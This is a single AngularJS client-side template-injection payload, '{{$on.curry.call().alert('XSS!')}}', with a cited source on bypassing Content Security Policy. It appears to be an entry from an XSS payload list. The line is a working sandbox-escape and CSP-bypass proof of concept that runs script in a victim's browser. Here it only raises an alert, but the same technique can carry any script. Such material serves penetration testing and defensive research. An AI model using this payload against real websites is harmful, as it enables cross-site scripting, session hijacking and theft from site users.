{{$on.curry.call().alert('XSS!')}}
source: https://blog.0daylabs.com/2016/09/09/bypassing-csp/